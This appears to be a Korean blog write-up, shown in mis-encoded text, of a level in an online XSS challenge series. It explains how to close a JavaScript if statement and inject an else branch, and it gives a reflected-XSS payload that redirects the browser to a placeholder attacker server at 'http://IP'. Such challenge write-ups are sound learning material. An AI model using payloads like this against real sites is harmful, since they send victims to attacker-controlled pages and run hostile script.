ν°μ€ν 리 λ·°
νλμ μ¬λ¦¬μ§ λͺ»νλ XSS μ±λ¦°μ§λ₯Ό μ€λλ§μ λ€μ νκ² λμμ΅λλ€. μ κ° μ¬λ―Έμκ² νκ³ μλ Alexander Korznikovμ XSS μ±λ¦°μ§μ μ₯μ μ κΈ°μ‘΄μ XSS κ²μκ³Όλ λ€λ₯΄κ² νν λ²μ μ¬λ¦° μ¬λλ€μ΄ λ§μ΄ μμΌλ©°(κ΅λ΄μμλ λ³Έ μ μ΄ μλ€μ..) μΆμ μμ μλλ₯Ό μμμ νμ νκ³ μΌλ§μ ννΈ μμ΄ κ³΅λ΅ νλ€λ μ μμ λμ± μ μ°©μ΄ κ°κ³ λͺ°μ μ΄ λλ κ±° κ°μ΅λλ€.
κ³΅λ΅ νμ΄μ§λ κ΅μ₯ν μ¬νν©λλ€. Reflected λ°©μμΌλ‘ νλΌλ―Έν°μ μ μ ν Payloadκ° μ½μ λ κ²½μ° λ€μ΄μΌλ‘κ·Έ νμ μ°½μ λμ°μ€ μ μμ΅λλ€.
μ΄μ λ¨κ³(8-1) μ μμ€μ μ μ¬ν ννμ μ½λλ₯Ό κ°μ§κ³ μμ΅λλ€. bλΌλ λ³μμλ "1"μ΄ μ μΈλμ΄ μκ³ if 쑰건문μ ν΅ν΄ μ€ν¬λ¦½νΈκ° μ€νλ μ μλλ‘ κ΅¬λ¬Έμ μμ±μμΌμΌ λ©λλ€.
bμ λ³μκ° 1λ‘ μ μΈλ μμ μμ True λ‘μ§μλ κ΄μ¬μ΄ μμ΅λλ€. μ°μ Your_Payloadκ° λ€μ΄κ°λ ꡬ문μ μ°μ μ μΌλ‘ λ«μμ£Όκ² μ΅λλ€.
'}else{document.location.href="http://IP"}
elseλ₯Ό μ μΈνμ¬ μμΈμ²λ¦¬μΌ λ μ½λκ° μ€νλλλ‘ κ³΅κ²©μ μλ²μ λ΄κΈ΄ μ½λλ₯Ό λ‘λνλλ‘ document.location.href μ μ μΈν΄μ μ§νν΄λ³΄κ² μ΅λλ€.
'}else{document.location.href="http://IP"}//
μμ μ½λλ₯Ό μ½μ ν΄λ³΄λ©΄. html"} μ΄νμ κ΅¬λ¬Έμ΄ λΆνμνκ² μ°κ²°λμ΄ μμ΄ μ¬λ°λ₯΄κ² μμ±λμ§ μμ΅λλ€. ν μ€ μ£Όμμ²λ¦¬μΈ "//" λλΈ μ¬λ¬μ¬λ₯Ό μ΄μ΄μ μμ±ν΄μ€λλ€.
μ΅μ’ μ μΌλ‘ μμ±λ Payloadλ₯Ό php?p=μ λ΄μμ μ μ‘ν΄λ³΄λλ‘ νκ² μ΅λλ€.
μ΅μ’ κ΅¬λ¬Έμ΄ μμ±λμμΌλ νλΌλ―Έν°μ μ λ ₯ν΄λ³΄λ©΄ μμ κ°μ΄ 곡격μ μλ²μ λ΄κΈ΄ htmlλ‘ λ¦¬λ€μ΄λ νΈ λμ΄ λ€μ΄μΌλ‘κ·Έ μ°½μ λμ°κ² λ©λλ€.
'CHALLENGE' μΉ΄ν κ³ λ¦¬μ λ€λ₯Έ κΈ
XSS Challenges 11 (0) | 2021.08.27 |
---|---|
XSS Challenges 10 (0) | 2021.08.26 |
XSS Challenges 8-1 (0) | 2020.12.12 |
[LOS] Dragon νμ΄(20) (0) | 2020.12.11 |
XSS Challenges 8 (0) | 2020.12.11 |